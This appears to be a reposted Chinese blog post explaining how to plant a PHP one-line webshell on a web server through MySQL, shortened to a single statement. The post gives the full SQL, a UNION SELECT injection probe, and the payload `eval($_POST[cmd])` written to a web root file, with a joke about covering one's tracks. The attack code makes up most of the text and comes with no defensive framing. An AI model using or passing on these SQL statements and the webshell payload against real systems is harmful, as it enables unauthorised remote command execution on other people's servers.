浅谈MySQL导出一句话木马拿WebShell的方法-只需要一句SQL

昨天看一篇文章中说到MySQL导出一句话木马拿WebShell的方法。
  文章中用到的SQL语句大体如下(命令行或者其它能执行SQL命令的shell都行):
  Drop TABLE IF EXISTS temp; //如果存在temp就删掉
  Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段
  Insert INTO temp (cmd) VALUES(''); //把一句话木马插入到temp表
  Select cmd from temp into out file 'F:/wwwroot/eval.php'; //查询temp表中的一句话并把结果导入到eval.php
  Drop TABLE IF EXISTS temp; //删除temp(擦屁股o(∩_∩)o...)
  这几句SQL很简单,我做了简单的注释。
  不过想想我们在测试PHP的SQL漏洞的时候经常用如下的语句:
  /**/UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12/*
  然后返回的页面中可能会出现1~12之间的数字。这里加入数字3显示出来了。
  如果我们把上面这句改成/**/UNION SELECT 1,2,'zerosoul',4,5,6,7,8,9,10,11,12/*,则返回页面上次显示3的地方会显示zerosoul。
  也就是说如果我们的select语句后面不带from table语句的话,我们说查询的数字或字符会直接返回到查询结果里。
  既然这样,我们为何还要那么麻烦去建一个表,先导入数据,再导出这样折腾呢。
  有了这个思路,上面那一大段到出一句话的SQL代码可以直接简化到一句:
  
Select '<? php eval($_POST[cmd]);?>' into outfile 'F:/wwwroot/eval.php';

  这样做不但简单明了,而且避免了误删别人的数据。

原文章链接:红黑联盟

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值